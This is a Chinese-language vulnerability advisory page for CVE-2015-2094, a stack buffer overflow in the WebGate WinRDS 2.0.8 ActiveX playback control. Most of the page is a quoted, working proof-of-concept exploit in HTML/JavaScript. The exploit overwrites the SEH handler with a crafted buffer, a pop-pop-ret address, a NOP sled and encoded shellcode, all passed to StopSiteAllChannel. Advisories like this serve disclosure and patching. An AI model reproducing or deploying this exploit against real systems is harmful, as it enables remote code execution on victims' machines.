当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

WebGate WinRDS 2.0.8 StopSiteAllChannel 栈溢出漏洞

     发表日期:2015-04-02 10:19:40

WebGate WinRDS 2.0.8 StopSiteAllChannel 栈溢出漏洞
CVE-ID:CVE-2015-2094
发布日期:2015-03-27
更新日期:2015-03-30
受影响系统:
Webgate WinRDS 2.0.8
详细信息:
 
WebGate WinRDS可通过网络传输DVR视频流。
 
 
 
WebGate WinRDS中,WESPPlayback.WESPPlaybackCtrl.1控件存在栈缓冲区溢出漏洞,通过PrintSiteImage、PlaySiteAllChannel、StopSiteAllChannel、SaveSiteImage函数相关矢量,远程攻击者可利用此漏洞执行任意代码。
 
 
来源:
Dave Weinstein
参考信息:
http://www.zerodayinitiative.com/advisories/ZDI-15-074/
测试方法:
警  告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<html>
 
<title>WebGate WinRDS WESPPlayback.WESPPlaybackCtrl.1 StopSiteAllChannel Stack Buffer Overflow Vulnerability (0Day)</title>
 
<!--
 
# Exploit Title: WebGate WinRDS StopSiteAllChannel Stack Overflow SEH Overwrite (0Day)
 
# Google Dork: [if relevant] (we will automatically add these to the GHDB)
 
# Date: 27th March, 2015
 
# Exploit Author: Praveen Darshanam
 
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
 
# Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36
 
# Version: WinRDS 2.0.8
 
# Tested on: Windows XP SP3 using IE/6/7/8
 
# CVE : 2015-2094
 
 
 
targetFile = "C:\\WINDOWS\\system32\\WESPSDK\\WESPPlayback.dll"
 
prototype  = "Sub StopSiteAllChannel ( ByVal SiteSerialNumber As String )"
 
progid     = "WESPPLAYBACKLib.WESPPlaybackCtrl"
 
Vulnerable Product = WinRDS 2.0.8
 
Software = http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36
 
-->
 
<object classid=\'clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8\' id=\'ssac\'>
 
</object>
 
<script>
 
 
 
var buff1 = "";
 
var nops = "";
 
var buff2 = "";
 
 
 
for (i=0;i<128; i++)
 
{
 
    buff1 += "B";
 
}
 
 
 
nseh = "\\xeb\\x08PD";
 
//pop pop ret = 1007f2a0 (0x1007f29e) 1007f2a0
 
var seh = "\\xa0\\xf2\\x07\\x10";
 
for (i=0;i<80; i++)
 
{
 
    nops += "\\x90";
 
}
 
sc = "\\x54\\x5d\\xda\\xc9\\xd9\\x75\\xf4\\x59\\x49\\x49\\x49\\x49\\x49" +
 
"\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30" +
 
"\\x56\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30" +
 
"\\x30\\x41\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42" +
 
"\\x32\\x42\\x42\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a" +
 
"\\x49\\x4b\\x4c\\x5a\\x48\\x4b\\x32\\x45\\x50\\x55\\x50\\x43\\x30" +
 
"\\x53\\x50\\x4b\\x39\\x4d\\x35\\x30\\x31\\x4f\\x30\\x52\\x44\\x4c" +
 
"\\x4b\\x56\\x30\\x46\\x50\\x4c\\x4b\\x31\\x42\\x34\\x4c\\x4c\\x4b" +
 
"\\x31\\x42\\x44\\x54\\x4c\\x4b\\x32\\x52\\x47\\x58\\x54\\x4f\\x38" +
 
"\\x37\\x50\\x4a\\x37\\x56\\x46\\x51\\x4b\\x4f\\x4e\\x4c\\x57\\x4c" +
 
"\\x35\\x31\\x33\\x4c\\x33\\x32\\x46\\x4c\\x37\\x50\\x49\\x51\\x48" +
 
"\\x4f\\x34\\x4d\\x45\\x51\\x4f\\x37\\x4d\\x32\\x4a\\x52\\x36\\x32" +
 
"\\x46\\x37\\x4c\\x4b\\x36\\x32\\x32\\x30\\x4c\\x4b\\x30\\x4a\\x37" +
 
"\\x4c\\x4c\\x4b\\x30\\x4c\\x32\\x31\\x54\\x38\\x5a\\x43\\x51\\x58" +
 
"\\x33\\x31\\x4e\\x31\\x30\\x51\\x4c\\x4b\\x36\\x39\\x47\\x50\\x53" +
 
"\\x31\\x48\\x53\\x4c\\x4b\\x30\\x49\\x35\\x48\\x5a\\x43\\x36\\x5a" +
 
"\\x57\\x39\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x33\\x31\\x49\\x46\\x56" +
 
"\\x51\\x4b\\x4f\\x4e\\x4c\\x49\\x51\\x38\\x4f\\x54\\x4d\\x35\\x51" +
 
"\\x58\\x47\\x37\\x48\\x4d\\x30\\x34\\x35\\x4a\\x56\\x43\\x33\\x43" +
 
"\\x4d\\x5a\\x58\\x37\\x4b\\x43\\x4d\\x46\\x44\\x43\\x45\\x4d\\x34" +
 
"\\x56\\x38\\x4c\\x4b\\x56\\x38\\x31\\x34\\x43\\x31\\x4e\\x33\\x42" +
 
"\\x46\\x4c\\x4b\\x44\\x4c\\x30\\x4b\\x4c\\x4b\\x36\\x38\\x45\\x4c" +
 
"\\x45\\x51\\x4e\\x33\\x4c\\x4b\\x54\\x44\\x4c\\x4b\\x33\\x31\\x48" +
 
"\\x50\\x4c\\x49\\x57\\x34\\x36\\x44\\x51\\x34\\x51\\x4b\\x51\\x4b" +
 
"\\x33\\x51\\x30\\x59\\x50\\x5a\\x36\\x31\\x4b\\x4f\\x4b\\x50\\x31" +
 
"\\x4f\\x51\\x4f\\x51\\x4a\\x4c\\x4b\\x42\\x32\\x5a\\x4b\\x4c\\x4d" +
 
"\\x31\\x4d\\x53\\x5a\\x35\\x51\\x4c\\x4d\\x4c\\x45\\x58\\x32\\x43" +
 
"\\x30\\x53\\x30\\x55\\x50\\x56\\x30\\x42\\x48\\x50\\x31\\x4c\\x4b" +
 
"\\x42\\x4f\\x4d\\x57\\x4b\\x4f\\x59\\x45\\x4f\\x4b\\x5a\\x50\\x48" +
 
"\\x35\\x4f\\x52\\x30\\x56\\x53\\x58\\x4e\\x46\\x5a\\x35\\x4f\\x4d" +
 
"\\x4d\\x4d\\x4b\\x4f\\x38\\x55\\x47\\x4c\\x53\\x36\\x33\\x4c\\x45" +
 
"\\x5a\\x4b\\x30\\x4b\\x4b\\x4b\\x50\\x43\\x45\\x43\\x35\\x4f\\x4b" +
 
"\\x47\\x37\\x32\\x33\\x53\\x42\\x42\\x4f\\x42\\x4a\\x55\\x50\\x46" +
 
"\\x33\\x4b\\x4f\\x49\\x45\\x43\\x53\\x53\\x51\\x52\\x4c\\x52\\x43" +
 
"\\x36\\x4e\\x55\\x35\\x44\\x38\\x33\\x55\\x33\\x30\\x41\\x41";
 
for (i=0;i<(5000 - (buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)
 
{
 
    buff2 += "A";
 
}
 
 
 
fbuff = buff1 + nseh + seh + nops + sc + buff2;
 
ssac.StopSiteAllChannel(fbuff);
 
 
 
</script>
 
</html>
解决办法:
厂商补丁:
 
Webgate
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 
 
 
http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&pt